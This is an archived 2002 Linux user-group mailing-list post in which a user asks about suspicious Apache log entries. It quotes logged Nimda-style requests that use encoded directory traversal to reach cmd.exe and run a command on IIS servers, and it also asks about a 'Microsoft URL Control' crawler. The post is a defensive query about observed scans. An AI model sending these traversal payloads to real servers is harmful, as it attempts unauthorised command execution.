[TCLUG] weird stuff in Apache logs

[Dan Drake]

I found some interesting things in my webserver logs. Has anybody here
seen these?

This is just a mutation of Nimda, right? I haven't seen these particular
request strings before:

61.168.254.16 - - [09/Feb/2002:05:50:50 -0600] "HEAD /msadc/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0 "-" "-"
61.168.254.16 - - [09/Feb/2002:05:50:50 -0600] "HEAD /PBServer/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0 "-" "-"
61.168.254.16 - - [09/Feb/2002:05:50:52 -0600] "HEAD /samples/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0 "-" "-"

This is much more interesting. What the heck is "Microsoft URL Control"?
I have a bunch more of these in my logs, grabbing different URLs off my
website. 

65.102.129.33 - - [03/Feb/2002:04:31:21 -0600] "GET / HTTP/1.1" 200 9236 "-" "Microsoft URL Control - 6.00.8169"

Thanks,

Dan

-- 
| 4699  BDCB  B1A5  28B6  7F8A  F8DF  EB6A  BC2A  B0A1  99BF (GPG)
| Dan Drake <drake+tclug at lemongecko.org> | http://lemongecko.org/drake/
| public key: email <drake+gpg at lemongecko.org>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 232 bytes
Desc: not available
Url : http://shadowknight.real-time.com/pipermail/tclug-list/attachments/20020215/7b34e163/attachment.pgp